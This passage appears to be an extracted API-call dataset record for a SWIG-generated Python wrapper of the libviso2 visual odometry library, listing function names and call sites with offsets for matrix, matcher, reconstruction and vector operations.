"_viso2.SwigPyIterator___isub__",
"_viso2.Point3dVector_pop",
"_viso2.VisualOdometry_process",
"_viso2.Matrix___mul__",
"_viso2.new_Matcher",
"_viso2.MatchVector_clear",
"_viso2.Point3dVector_resize",
"_viso2.SwigPyIterator___ne__",
"imp.load_module",
"_viso2.MatchVector___bool__",
"_viso2.Point3dVector_front",
"_viso2.TrackVector_assign",
"_viso2.Point3dVector_reserve",
"_viso2.new_Matrix",
"_viso2.MatchVector_reserve",
"_viso2.TrackVector___delslice__",
"_viso2.Matrix___neg__",
"_viso2.MatchVector_back",
"_viso2.Point3dVector_append",
"_viso2.MatchVector_rbegin",
"_viso2.new_TrackVector",
"_viso2.Point3dVector_pop_back",
"_viso2.TrackVector_end",
"_viso2.Point3dVector_get_allocator",
"_viso2.Matcher_bucketFeatures",
"_viso2.Matcher_pushBack",
"_viso2.Point3dVector___setslice__",
"_viso2.Point3dVector_insert",
"_viso2.Matrix_mean",
"_viso2.SwigPyIterator_previous",
"_viso2.Point3dVector_iterator",
"_viso2.new_Point3dVector",
"_viso2.TrackVector_reserve",
"_viso2.Matrix___invert__",
"_viso2.TrackVector_begin",
"_viso2.TrackVector_front",
"_viso2.Point3dVector___bool__",
"_viso2.Matrix_extractCols",
"_viso2.new_calibration",
"os.path.dirname",
"_viso2.MatchVector_empty",
"_viso2.new_VisualOdometryMono",
"_viso2.Matrix_solve",
"_viso2.VisualOdometry_getGain",
"_viso2.VisualOdometryStereo_process",
"_viso2.MatchVector___setitem__",
"_viso2.MatchVector_resize",
"_viso2.MatchVector_begin",
"_viso2.new_p_match",
"_viso2.SwigPyIterator_next",
"_viso2.Point3dVector_assign",
"_viso2.SwigPyIterator_decr",
"_viso2.MatchVector_front",
"_viso2.MatchVector___delitem__",
"_viso2.MatchVector___getslice__",
"_viso2.TrackVector___len__",
"_viso2.MatchVector_erase",
"_viso2.TrackVector___nonzero__",
"_viso2.Matrix_getData",
"_viso2.Matcher_getGain",
"_viso2.TrackVector___bool__",
"_viso2.Matrix_rotMatX",
"_viso2.MatchVector_rend",
"_viso2.Point3dVector___getslice__",
"_viso2.Reconstruction_getPoints",
"_viso2.new_point3d",
"_viso2.Reconstruction_update",
"_viso2.Matrix___sub__",
"_viso2.Matrix_l2norm",
"_viso2.TrackVector_insert",
"_viso2.TrackVector_rend",
"_viso2.MatchVector_iterator",
"_viso2.new_Stereo_parameters",
"_viso2.TrackVector_back",
"_viso2.Point3dVector_end",
"_viso2.VisualOdometry_getNumberOfMatches",
"_viso2.VisualOdometryMono_process_frame",
"_viso2.Point3dVector_erase",
"_viso2.TrackVector_clear",
"_viso2.new_Mono_parameters",
"_viso2.MatchVector_append",
"_viso2.new_bucketing",
"_viso2.Point3dVector_begin",
"_viso2.TrackVector_capacity",
"_viso2.Matrix___str__",
"_viso2.Matrix_lu",
"_viso2.SwigPyIterator_advance",
"_viso2.new_Reconstruction",
"_viso2.MatchVector___nonzero__",
"_viso2.SwigPyIterator_distance",
"_viso2.Reconstruction_setCalibration",
"_viso2.SwigPyIterator___sub__"
]
| [((26063, 26083), '_viso2.Matrix_eye', '_viso2.Matrix_eye', (['m'], {}), '(m)\n', (26080, 26083), False, 'import _viso2\n'), ((26151, 26172), '_viso2.Matrix_diag', '_viso2.Matrix_diag', (['M'], {}), '(M)\n', (26169, 26172), False, 'import _viso2\n'), ((26258, 26288), '_viso2.Matrix_reshape', '_viso2.Matrix_reshape', (['M', 'm', 'n'], {}), '(M, m, n)\n', (26279, 26288), False, 'import _viso2\n'), ((26370, 26398), '_viso2.Matrix_rotMatX', '_viso2.Matrix_rotMatX', (['angle'], {}), '(angle)\n', (26391, 26398), False, 'import _viso2\n'), ((26480, 26508), '_viso2.Matrix_rotMatY', '_viso2.Matrix_rotMatY', (['angle'], {}), '(angle)\n', (26501, 26508), False, 'import _viso2\n'), ((26590, 26618), '_viso2.Matrix_rotMatZ', '_viso2.Matrix_rotMatZ', (['angle'], {}), '(angle)\n', (26611, 26618), False, 'import _viso2\n'), ((26694, 26719), '_viso2.Matrix_cross', '_viso2.Matrix_cross', (['a', 'b'], {}), '(a, b)\n', (26713, 26719), False, 'import _viso2\n'), ((26785, 26805), '_viso2.Matrix_inv', '_viso2.Matrix_inv', (['M'], {}), '(M)\n', (26802, 26805), False, 'import _viso2\n'), ((3477, 3510), '_viso2.SwigPyIterator_value', '_viso2.SwigPyIterator_value', (['self'], {}), '(self)\n', (3504, 3510), False, 'import _viso2\n'), ((3656, 3691), '_viso2.SwigPyIterator_incr', '_viso2.SwigPyIterator_incr', (['self', 'n'], {}), '(self, n)\n', (3682, 3691), False, 'import _viso2\n'), ((3837, 3872), '_viso2.SwigPyIterator_decr', '_viso2.SwigPyIterator_decr', (['self', 'n'], {}), '(self, n)\n', (3863, 3872), False, 'import _viso2\n'), ((3962, 4001), '_viso2.SwigPyIterator_distance', '_viso2.SwigPyIterator_distance', (['self', 'x'], {}), '(self, x)\n', (3992, 4001), False, 'import _viso2\n'), ((4080, 4116), '_viso2.SwigPyIterator_equal', '_viso2.SwigPyIterator_equal', (['self', 'x'], {}), '(self, x)\n', (4107, 4116), False, 'import _viso2\n'), ((4197, 4229), '_viso2.SwigPyIterator_copy', '_viso2.SwigPyIterator_copy', (['self'], {}), '(self)\n', (4223, 4229), False, 'import _viso2\n'), ((4306, 4338), '_viso2.SwigPyIterator_next', '_viso2.SwigPyIterator_next', (['self'], {}), '(self)\n', (4332, 4338), False, 'import _viso2\n'), ((4423, 4459), '_viso2.SwigPyIterator___next__', '_viso2.SwigPyIterator___next__', (['self'], {}), '(self)\n', (4453, 4459), False, 'import _viso2\n'), ((4544, 4580), '_viso2.SwigPyIterator_previous', '_viso2.SwigPyIterator_previous', (['self'], {}), '(self)\n', (4574, 4580), False, 'import _viso2\n'), ((4673, 4711), '_viso2.SwigPyIterator_advance', '_viso2.SwigPyIterator_advance', (['self', 'n'], {}), '(self, n)\n', (4702, 4711), False, 'import _viso2\n'), ((4792, 4829), '_viso2.SwigPyIterator___eq__', '_viso2.SwigPyIterator___eq__', (['self', 'x'], {}), '(self, x)\n', (4820, 4829), False, 'import _viso2\n'), ((4910, 4947), '_viso2.SwigPyIterator___ne__', '_viso2.SwigPyIterator___ne__', (['self', 'x'], {}), '(self, x)\n', (4938, 4947), False, 'import _viso2\n'), ((5042, 5081), '_viso2.SwigPyIterator___iadd__', '_viso2.SwigPyIterator___iadd__', (['self', 'n'], {}), '(self, n)\n', (5072, 5081), False, 'import _viso2\n'), ((5176, 5215), '_viso2.SwigPyIterator___isub__', '_viso2.SwigPyIterator___isub__', (['self', 'n'], {}), '(self, n)\n', (5206, 5215), False, 'import _viso2\n'), ((5308, 5346), '_viso2.SwigPyIterator___add__', '_viso2.SwigPyIterator___add__', (['self', 'n'], {}), '(self, n)\n', (5337, 5346), False, 'import _viso2\n'), ((5499, 5541), '_viso2.SwigPyIterator___sub__', '_viso2.SwigPyIterator___sub__', (['self', '*args'], {}), '(self, *args)\n', (5528, 5541), False, 'import _viso2\n'), ((6330, 6377), '_viso2.VisualOdometry_process', '_viso2.VisualOdometry_process', (['self', 'p_matched_'], {}), '(self, p_matched_)\n', (6359, 6377), False, 'import _viso2\n'), ((6460, 6497), '_viso2.VisualOdometry_getMotion', '_viso2.VisualOdometry_getMotion', (['self'], {}), '(self)\n', (6491, 6497), False, 'import _viso2\n'), ((6587, 6625), '_viso2.VisualOdometry_getMatches', '_viso2.VisualOdometry_getMatches', (['self'], {}), '(self)\n', (6619, 6625), False, 'import _viso2\n'), ((6727, 6773), '_viso2.VisualOdometry_getNumberOfMatches', '_viso2.VisualOdometry_getNumberOfMatches', (['self'], {}), '(self)\n', (6767, 6773), False, 'import _viso2\n'), ((6875, 6921), '_viso2.VisualOdometry_getNumberOfInliers', '_viso2.VisualOdometry_getNumberOfInliers', (['self'], {}), '(self)\n', (6915, 6921), False, 'import _viso2\n'), ((7060, 7104), '_viso2.VisualOdometry_getInlierIndices', '_viso2.VisualOdometry_getInlierIndices', (['self'], {}), '(self)\n', (7098, 7104), False, 'import _viso2\n'), ((7202, 7247), '_viso2.VisualOdometry_getGain', '_viso2.VisualOdometry_getGain', (['self', 'inliers_'], {}), '(self, inliers_)\n', (7231, 7247), False, 'import _viso2\n'), ((8421, 8445), '_viso2.new_calibration', '_viso2.new_calibration', ([], {}), '()\n', (8443, 8445), False, 'import _viso2\n'), ((9992, 10014), '_viso2.new_bucketing', '_viso2.new_bucketing', ([], {}), '()\n', (10012, 10014), False, 'import _viso2\n'), ((11469, 11495), '_viso2.new_VO_parameters', '_viso2.new_VO_parameters', ([], {}), '()\n', (11493, 11495), False, 'import _viso2\n'), ((12475, 12511), '_viso2.new_VisualOdometryMono', '_viso2.new_VisualOdometryMono', (['param'], {}), '(param)\n', (12504, 12511), False, 'import _viso2\n'), ((12981, 13027), '_viso2.VisualOdometryMono_process', '_viso2.VisualOdometryMono_process', (['self', '*args'], {}), '(self, *args)\n', (13014, 13027), False, 'import _viso2\n'), ((13129, 13177), '_viso2.VisualOdometryMono_getInlierMatches', '_viso2.VisualOdometryMono_getInlierMatches', (['self'], {}), '(self)\n', (13171, 13177), False, 'import _viso2\n'), ((13477, 13529), '_viso2.VisualOdometryMono_process_frame', '_viso2.VisualOdometryMono_process_frame', (['self', '*args'], {}), '(self, *args)\n', (13516, 13529), False, 'import _viso2\n'), ((15790, 15818), '_viso2.new_Mono_parameters', '_viso2.new_Mono_parameters', ([], {}), '()\n', (15816, 15818), False, 'import _viso2\n'), ((16818, 16856), '_viso2.new_VisualOdometryStereo', '_viso2.new_VisualOdometryStereo', (['param'], {}), '(param)\n', (16849, 16856), False, 'import _viso2\n'), ((17277, 17325), '_viso2.VisualOdometryStereo_process', '_viso2.VisualOdometryStereo_process', (['self', '*args'], {}), '(self, *args)\n', (17312, 17325), False, 'import _viso2\n'), ((17546, 17618), '_viso2.VisualOdometryStereo_process_frame', '_viso2.VisualOdometryStereo_process_frame', (['self', 'image1', 'image2', 'replace'], {}), '(self, image1, image2, replace)\n', (17587, 17618), False, 'import _viso2\n'), ((19627, 19657), '_viso2.new_Stereo_parameters', '_viso2.new_Stereo_parameters', ([], {}), '()\n', (19655, 19657), False, 'import _viso2\n'), ((20507, 20531), '_viso2.new_Matrix', '_viso2.new_Matrix', (['*args'], {}), '(*args)\n', (20524, 20531), False, 'import _viso2\n'), ((20804, 20833), '_viso2.Matrix_assign', '_viso2.Matrix_assign', (['self', 'M'], {}), '(self, M)\n', (20824, 20833), False, 'import _viso2\n'), ((21133, 21182), '_viso2.Matrix_getData', '_viso2.Matrix_getData', (['self', 'val_', 'i1', 'j1', 'i2', 'j2'], {}), '(self, val_, i1, j1, i2, j2)\n', (21154, 21182), False, 'import _viso2\n'), ((21406, 21448), '_viso2.Matrix_getMat', '_viso2.Matrix_getMat', (['self', 'i1', 'j1', 'i2', 'j2'], {}), '(self, i1, j1, i2, j2)\n', (21426, 21448), False, 'import _viso2\n'), ((21533, 21568), '_viso2.Matrix_setMat', '_viso2.Matrix_setMat', (['self', 'M', 'i', 'j'], {}), '(self, M, i, j)\n', (21553, 21568), False, 'import _viso2\n'), ((21844, 21889), '_viso2.Matrix_setVal', '_viso2.Matrix_setVal', (['self', 's', 'i1', 'j1', 'i2', 'j2'], {}), '(self, s, i1, j1, i2, j2)\n', (21864, 21889), False, 'import _viso2\n'), ((22064, 22102), '_viso2.Matrix_setDiag', '_viso2.Matrix_setDiag', (['self', 's', 'i1', 'i2'], {}), '(self, s, i1, i2)\n', (22085, 22102), False, 'import _viso2\n'), ((22165, 22189), '_viso2.Matrix_zero', '_viso2.Matrix_zero', (['self'], {}), '(self)\n', (22183, 22189), False, 'import _viso2\n'), ((22286, 22322), '_viso2.Matrix_extractCols', '_viso2.Matrix_extractCols', (['self', 'idx'], {}), '(self, idx)\n', (22311, 22322), False, 'import _viso2\n'), ((22387, 22407), '_viso2.Matrix_eye', '_viso2.Matrix_eye', (['m'], {}), '(m)\n', (22404, 22407), False, 'import _viso2\n'), ((22506, 22534), '_viso2.Matrix_identity', '_viso2.Matrix_identity', (['self'], {}), '(self)\n', (22528, 22534), False, 'import _viso2\n'), ((22601, 22622), '_viso2.Matrix_diag', '_viso2.Matrix_diag', (['M'], {}), '(M)\n', (22619, 22622), False, 'import _viso2\n'), ((22737, 22767), '_viso2.Matrix_reshape', '_viso2.Matrix_reshape', (['M', 'm', 'n'], {}), '(M, m, n)\n', (22758, 22767), False, 'import _viso2\n'), ((22884, 22912), '_viso2.Matrix_rotMatX', '_viso2.Matrix_rotMatX', (['angle'], {}), '(angle)\n', (22905, 22912), False, 'import _viso2\n'), ((23029, 23057), '_viso2.Matrix_rotMatY', '_viso2.Matrix_rotMatY', (['angle'], {}), '(angle)\n', (23050, 23057), False, 'import _viso2\n'), ((23174, 23202), '_viso2.Matrix_rotMatZ', '_viso2.Matrix_rotMatZ', (['angle'], {}), '(angle)\n', (23195, 23202), False, 'import _viso2\n'), ((23323, 23353), '_viso2.Matrix___add__', '_viso2.Matrix___add__', (['self', 'M'], {}), '(self, M)\n', (23344, 23353), False, 'import _viso2\n'), ((23438, 23468), '_viso2.Matrix___sub__', '_viso2.Matrix___sub__', (['self', 'M'], {}), '(self, M)\n', (23459, 23468), False, 'import _viso2\n'), ((23610, 23644), '_viso2.Matrix___mul__', '_viso2.Matrix___mul__', (['self', '*args'], {}), '(self, *args)\n', (23631, 23644), False, 'import _viso2\n'), ((23696, 23734), '_viso2.Matrix___truediv__', '_viso2.Matrix___truediv__', (['self', '*args'], {}), '(self, *args)\n', (23721, 23734), False, 'import _viso2\n'), ((23840, 23867), '_viso2.Matrix___neg__', '_viso2.Matrix___neg__', (['self'], {}), '(self)\n', (23861, 23867), False, 'import _viso2\n'), ((23952, 23982), '_viso2.Matrix___invert__', '_viso2.Matrix___invert__', (['self'], {}), '(self)\n', (23976, 23982), False, 'import _viso2\n'), ((24058, 24084), '_viso2.Matrix_l2norm', '_viso2.Matrix_l2norm', (['self'], {}), '(self)\n', (24078, 24084), False, 'import _viso2\n'), ((24156, 24180), '_viso2.Matrix_mean', '_viso2.Matrix_mean', (['self'], {}), '(self)\n', (24174, 24180), False, 'import _viso2\n'), ((24255, 24280), '_viso2.Matrix_cross', '_viso2.Matrix_cross', (['a', 'b'], {}), '(a, b)\n', (24274, 24280), False, 'import _viso2\n'), ((24377, 24397), '_viso2.Matrix_inv', '_viso2.Matrix_inv', (['M'], {}), '(M)\n', (24394, 24397), False, 'import _viso2\n'), ((24508, 24538), '_viso2.Matrix_setInverse', '_viso2.Matrix_setInverse', (['self'], {}), '(self)\n', (24532, 24538), False, 'import _viso2\n'), ((24608, 24631), '_viso2.Matrix_det', '_viso2.Matrix_det', (['self'], {}), '(self)\n', (24625, 24631), False, 'import _viso2\n'), ((24781, 24814), '_viso2.Matrix_solve', '_viso2.Matrix_solve', (['self', 'M', 'eps'], {}), '(self, M, eps)\n', (24800, 24814), False, 'import _viso2\n'), ((24970, 25005), '_viso2.Matrix_lu', '_viso2.Matrix_lu', (['self', 'idx', 'd', 'eps'], {}), '(self, idx, d, eps)\n', (24986, 25005), False, 'import _viso2\n'), ((25084, 25116), '_viso2.Matrix_svd', '_viso2.Matrix_svd', (['self', 'U', 'W', 'V'], {}), '(self, U, W, V)\n', (25101, 25116), False, 'import _viso2\n'), ((25781, 25808), '_viso2.Matrix___str__', '_viso2.Matrix___str__', (['self'], {}), '(self)\n', (25802, 25808), False, 'import _viso2\n'), ((25887, 25919), '_viso2.Matrix_toNumpy', '_viso2.Matrix_toNumpy', (['self', 'mat'], {}), '(self, mat)\n', (25908, 25919), False, 'import _viso2\n'), ((27206, 27231), '_viso2.new_Matcher', '_viso2.new_Matcher', (['param'], {}), '(param)\n', (27224, 27231), False, 'import _viso2\n'), ((27537, 27588), '_viso2.Matcher_setIntrinsics', '_viso2.Matcher_setIntrinsics', (['self', 'f', 'cu', 'cv', 'base'], {}), '(self, f, cu, cv, base)\n', (27565, 27588), False, 'import _viso2\n'), ((27769, 27821), '_viso2.Matcher_matchFeatures', '_viso2.Matcher_matchFeatures', (['self', 'method', 'Tr_delta'], {}), '(self, method, Tr_delta)\n', (27797, 27821), False, 'import _viso2\n'), ((27990, 28068), '_viso2.Matcher_bucketFeatures', '_viso2.Matcher_bucketFeatures', (['self', 'max_features', 'bucket_width', 'bucket_height'], {}), '(self, max_features, bucket_width, bucket_height)\n', (28019, 28068), False, 'import _viso2\n'), ((28158, 28189), '_viso2.Matcher_getMatches', '_viso2.Matcher_getMatches', (['self'], {}), '(self)\n', (28183, 28189), False, 'import _viso2\n'), ((28285, 28322), '_viso2.Matcher_getGain', '_viso2.Matcher_getGain', (['self', 'inliers'], {}), '(self, inliers)\n', (28307, 28322), False, 'import _viso2\n'), ((28653, 28689), '_viso2.Matcher_pushBack', '_viso2.Matcher_pushBack', (['self', '*args'], {}), '(self, *args)\n', (28676, 28689), False, 'import _viso2\n'), ((33456, 33487), '_viso2.new_Matcher_parameters', '_viso2.new_Matcher_parameters', ([], {}), '()\n', (33485, 33487), False, 'import _viso2\n'), ((36814, 36839), '_viso2.new_p_match', '_viso2.new_p_match', (['*args'], {}), '(*args)\n', (36832, 36839), False, 'import _viso2\n'), ((37534, 37561), '_viso2.new_Reconstruction', '_viso2.new_Reconstruction', ([], {}), '()\n', (37559, 37561), False, 'import _viso2\n'), ((37864, 37917), '_viso2.Reconstruction_setCalibration', '_viso2.Reconstruction_setCalibration', (['self', 'f', 'cu', 'cv'], {}), '(self, f, cu, cv)\n', (37900, 37917), False, 'import _viso2\n'), ((38391, 38495), '_viso2.Reconstruction_update', '_viso2.Reconstruction_update', (['self', 'p_matched', 'Tr', 'point_type', 'min_track_length', 'max_dist', 'min_angle'], {}), '(self, p_matched, Tr, point_type,\n min_track_length, max_dist, min_angle)\n', (38419, 38495), False, 'import _viso2\n'), ((38581, 38618), '_viso2.Reconstruction_getPoints', '_viso2.Reconstruction_getPoints', (['self'], {}), '(self)\n', (38612, 38618), False, 'import _viso2\n'), ((38706, 38743), '_viso2.Reconstruction_getTracks', '_viso2.Reconstruction_getTracks', (['self'], {}), '(self)\n', (38737, 38743), False, 'import _viso2\n'), ((39903, 39928), '_viso2.new_point3d', '_viso2.new_point3d', (['*args'], {}), '(*args)\n', (39921, 39928), False, 'import _viso2\n'), ((41055, 41080), '_viso2.new_point2d', '_viso2.new_point2d', (['*args'], {}), '(*args)\n', (41073, 41080), False, 'import _viso2\n'), ((43108, 43126), '_viso2.new_track', '_viso2.new_track', ([], {}), '()\n', (43124, 43126), False, 'import _viso2\n'), ((43819, 43852), '_viso2.MatchVector_iterator', '_viso2.MatchVector_iterator', (['self'], {}), '(self)\n', (43846, 43852), False, 'import _viso2\n'), ((43992, 44028), '_viso2.MatchVector___nonzero__', '_viso2.MatchVector___nonzero__', (['self'], {}), '(self)\n', (44022, 44028), False, 'import _viso2\n'), ((44107, 44140), '_viso2.MatchVector___bool__', '_viso2.MatchVector___bool__', (['self'], {}), '(self)\n', (44134, 44140), False, 'import _viso2\n'), ((44255, 44287), '_viso2.MatchVector___len__', '_viso2.MatchVector___len__', (['self'], {}), '(self)\n', (44281, 44287), False, 'import _viso2\n'), ((44393, 44436), '_viso2.MatchVector___getslice__', '_viso2.MatchVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (44424, 44436), False, 'import _viso2\n'), ((44582, 44626), '_viso2.MatchVector___setslice__', '_viso2.MatchVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (44613, 44626), False, 'import _viso2\n'), ((44717, 44760), '_viso2.MatchVector___delslice__', '_viso2.MatchVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (44748, 44760), False, 'import _viso2\n'), ((44898, 44941), '_viso2.MatchVector___delitem__', '_viso2.MatchVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (44928, 44941), False, 'import _viso2\n'), ((45105, 45148), '_viso2.MatchVector___getitem__', '_viso2.MatchVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (45135, 45148), False, 'import _viso2\n'), ((45325, 45368), '_viso2.MatchVector___setitem__', '_viso2.MatchVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (45355, 45368), False, 'import _viso2\n'), ((45440, 45468), '_viso2.MatchVector_pop', '_viso2.MatchVector_pop', (['self'], {}), '(self)\n', (45462, 45468), False, 'import _viso2\n'), ((45541, 45575), '_viso2.MatchVector_append', '_viso2.MatchVector_append', (['self', 'x'], {}), '(self, x)\n', (45566, 45575), False, 'import _viso2\n'), ((45648, 45678), '_viso2.MatchVector_empty', '_viso2.MatchVector_empty', (['self'], {}), '(self)\n', (45672, 45678), False, 'import _viso2\n'), ((45787, 45816), '_viso2.MatchVector_size', '_viso2.MatchVector_size', (['self'], {}), '(self)\n', (45810, 45816), False, 'import _viso2\n'), ((45885, 45917), '_viso2.MatchVector_swap', '_viso2.MatchVector_swap', (['self', 'v'], {}), '(self, v)\n', (45908, 45917), False, 'import _viso2\n'), ((46027, 46057), '_viso2.MatchVector_begin', '_viso2.MatchVector_begin', (['self'], {}), '(self)\n', (46051, 46057), False, 'import _viso2\n'), ((46163, 46191), '_viso2.MatchVector_end', '_viso2.MatchVector_end', (['self'], {}), '(self)\n', (46185, 46191), False, 'import _viso2\n'), ((46311, 46342), '_viso2.MatchVector_rbegin', '_viso2.MatchVector_rbegin', (['self'], {}), '(self)\n', (46336, 46342), False, 'import _viso2\n'), ((46458, 46487), '_viso2.MatchVector_rend', '_viso2.MatchVector_rend', (['self'], {}), '(self)\n', (46481, 46487), False, 'import _viso2\n'), ((46552, 46582), '_viso2.MatchVector_clear', '_viso2.MatchVector_clear', (['self'], {}), '(self)\n', (46576, 46582), False, 'import _viso2\n'), ((46714, 46752), '_viso2.MatchVector_get_allocator', '_viso2.MatchVector_get_allocator', (['self'], {}), '(self)\n', (46746, 46752), False, 'import _viso2\n'), ((46823, 46856), '_viso2.MatchVector_pop_back', '_viso2.MatchVector_pop_back', (['self'], {}), '(self)\n', (46850, 46856), False, 'import _viso2\n'), ((47074, 47111), '_viso2.MatchVector_erase', '_viso2.MatchVector_erase', (['self', '*args'], {}), '(self, *args)\n', (47098, 47111), False, 'import _viso2\n'), ((47361, 47390), '_viso2.new_MatchVector', '_viso2.new_MatchVector', (['*args'], {}), '(*args)\n', (47383, 47390), False, 'import _viso2\n'), ((47583, 47620), '_viso2.MatchVector_push_back', '_viso2.MatchVector_push_back', (['self', 'x'], {}), '(self, x)\n', (47611, 47620), False, 'import _viso2\n'), ((47696, 47726), '_viso2.MatchVector_front', '_viso2.MatchVector_front', (['self'], {}), '(self)\n', (47720, 47726), False, 'import _viso2\n'), ((47800, 47829), '_viso2.MatchVector_back', '_viso2.MatchVector_back', (['self'], {}), '(self)\n', (47823, 47829), False, 'import _viso2\n'), ((47908, 47945), '_viso2.MatchVector_assign', '_viso2.MatchVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (47933, 47945), False, 'import _viso2\n'), ((48081, 48119), '_viso2.MatchVector_resize', '_viso2.MatchVector_resize', (['self', '*args'], {}), '(self, *args)\n', (48106, 48119), False, 'import _viso2\n'), ((48296, 48334), '_viso2.MatchVector_insert', '_viso2.MatchVector_insert', (['self', '*args'], {}), '(self, *args)\n', (48321, 48334), False, 'import _viso2\n'), ((48409, 48444), '_viso2.MatchVector_reserve', '_viso2.MatchVector_reserve', (['self', 'n'], {}), '(self, n)\n', (48435, 48444), False, 'import _viso2\n'), ((48561, 48594), '_viso2.MatchVector_capacity', '_viso2.MatchVector_capacity', (['self'], {}), '(self)\n', (48588, 48594), False, 'import _viso2\n'), ((49216, 49251), '_viso2.Point3dVector_iterator', '_viso2.Point3dVector_iterator', (['self'], {}), '(self)\n', (49245, 49251), False, 'import _viso2\n'), ((49391, 49429), '_viso2.Point3dVector___nonzero__', '_viso2.Point3dVector___nonzero__', (['self'], {}), '(self)\n', (49423, 49429), False, 'import _viso2\n'), ((49508, 49543), '_viso2.Point3dVector___bool__', '_viso2.Point3dVector___bool__', (['self'], {}), '(self)\n', (49537, 49543), False, 'import _viso2\n'), ((49665, 49699), '_viso2.Point3dVector___len__', '_viso2.Point3dVector___len__', (['self'], {}), '(self)\n', (49693, 49699), False, 'import _viso2\n'), ((49807, 49852), '_viso2.Point3dVector___getslice__', '_viso2.Point3dVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (49840, 49852), False, 'import _viso2\n'), ((49998, 50044), '_viso2.Point3dVector___setslice__', '_viso2.Point3dVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (50031, 50044), False, 'import _viso2\n'), ((50135, 50180), '_viso2.Point3dVector___delslice__', '_viso2.Point3dVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (50168, 50180), False, 'import _viso2\n'), ((50318, 50363), '_viso2.Point3dVector___delitem__', '_viso2.Point3dVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (50350, 50363), False, 'import _viso2\n'), ((50529, 50574), '_viso2.Point3dVector___getitem__', '_viso2.Point3dVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (50561, 50574), False, 'import _viso2\n'), ((50751, 50796), '_viso2.Point3dVector___setitem__', '_viso2.Point3dVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (50783, 50796), False, 'import _viso2\n'), ((50868, 50898), '_viso2.Point3dVector_pop', '_viso2.Point3dVector_pop', (['self'], {}), '(self)\n', (50892, 50898), False, 'import _viso2\n'), ((50971, 51007), '_viso2.Point3dVector_append', '_viso2.Point3dVector_append', (['self', 'x'], {}), '(self, x)\n', (50998, 51007), False, 'import _viso2\n'), ((51080, 51112), '_viso2.Point3dVector_empty', '_viso2.Point3dVector_empty', (['self'], {}), '(self)\n', (51106, 51112), False, 'import _viso2\n'), ((51228, 51259), '_viso2.Point3dVector_size', '_viso2.Point3dVector_size', (['self'], {}), '(self)\n', (51253, 51259), False, 'import _viso2\n'), ((51328, 51362), '_viso2.Point3dVector_swap', '_viso2.Point3dVector_swap', (['self', 'v'], {}), '(self, v)\n', (51353, 51362), False, 'import _viso2\n'), ((51479, 51511), '_viso2.Point3dVector_begin', '_viso2.Point3dVector_begin', (['self'], {}), '(self)\n', (51505, 51511), False, 'import _viso2\n'), ((51624, 51654), '_viso2.Point3dVector_end', '_viso2.Point3dVector_end', (['self'], {}), '(self)\n', (51648, 51654), False, 'import _viso2\n'), ((51781, 51814), '_viso2.Point3dVector_rbegin', '_viso2.Point3dVector_rbegin', (['self'], {}), '(self)\n', (51808, 51814), False, 'import _viso2\n'), ((51937, 51968), '_viso2.Point3dVector_rend', '_viso2.Point3dVector_rend', (['self'], {}), '(self)\n', (51962, 51968), False, 'import _viso2\n'), ((52033, 52065), '_viso2.Point3dVector_clear', '_viso2.Point3dVector_clear', (['self'], {}), '(self)\n', (52059, 52065), False, 'import _viso2\n'), ((52204, 52244), '_viso2.Point3dVector_get_allocator', '_viso2.Point3dVector_get_allocator', (['self'], {}), '(self)\n', (52238, 52244), False, 'import _viso2\n'), ((52315, 52350), '_viso2.Point3dVector_pop_back', '_viso2.Point3dVector_pop_back', (['self'], {}), '(self)\n', (52344, 52350), False, 'import _viso2\n'), ((52582, 52621), '_viso2.Point3dVector_erase', '_viso2.Point3dVector_erase', (['self', '*args'], {}), '(self, *args)\n', (52608, 52621), False, 'import _viso2\n'), ((52879, 52910), '_viso2.new_Point3dVector', '_viso2.new_Point3dVector', (['*args'], {}), '(*args)\n', (52903, 52910), False, 'import _viso2\n'), ((53103, 53142), '_viso2.Point3dVector_push_back', '_viso2.Point3dVector_push_back', (['self', 'x'], {}), '(self, x)\n', (53133, 53142), False, 'import _viso2\n'), ((53218, 53250), '_viso2.Point3dVector_front', '_viso2.Point3dVector_front', (['self'], {}), '(self)\n', (53244, 53250), False, 'import _viso2\n'), ((53324, 53355), '_viso2.Point3dVector_back', '_viso2.Point3dVector_back', (['self'], {}), '(self)\n', (53349, 53355), False, 'import _viso2\n'), ((53434, 53473), '_viso2.Point3dVector_assign', '_viso2.Point3dVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (53461, 53473), False, 'import _viso2\n'), ((53609, 53649), '_viso2.Point3dVector_resize', '_viso2.Point3dVector_resize', (['self', '*args'], {}), '(self, *args)\n', (53636, 53649), False, 'import _viso2\n'), ((53833, 53873), '_viso2.Point3dVector_insert', '_viso2.Point3dVector_insert', (['self', '*args'], {}), '(self, *args)\n', (53860, 53873), False, 'import _viso2\n'), ((53948, 53985), '_viso2.Point3dVector_reserve', '_viso2.Point3dVector_reserve', (['self', 'n'], {}), '(self, n)\n', (53976, 53985), False, 'import _viso2\n'), ((54109, 54144), '_viso2.Point3dVector_capacity', '_viso2.Point3dVector_capacity', (['self'], {}), '(self)\n', (54138, 54144), False, 'import _viso2\n'), ((54768, 54801), '_viso2.TrackVector_iterator', '_viso2.TrackVector_iterator', (['self'], {}), '(self)\n', (54795, 54801), False, 'import _viso2\n'), ((54941, 54977), '_viso2.TrackVector___nonzero__', '_viso2.TrackVector___nonzero__', (['self'], {}), '(self)\n', (54971, 54977), False, 'import _viso2\n'), ((55056, 55089), '_viso2.TrackVector___bool__', '_viso2.TrackVector___bool__', (['self'], {}), '(self)\n', (55083, 55089), False, 'import _viso2\n'), ((55209, 55241), '_viso2.TrackVector___len__', '_viso2.TrackVector___len__', (['self'], {}), '(self)\n', (55235, 55241), False, 'import _viso2\n'), ((55347, 55390), '_viso2.TrackVector___getslice__', '_viso2.TrackVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (55378, 55390), False, 'import _viso2\n'), ((55536, 55580), '_viso2.TrackVector___setslice__', 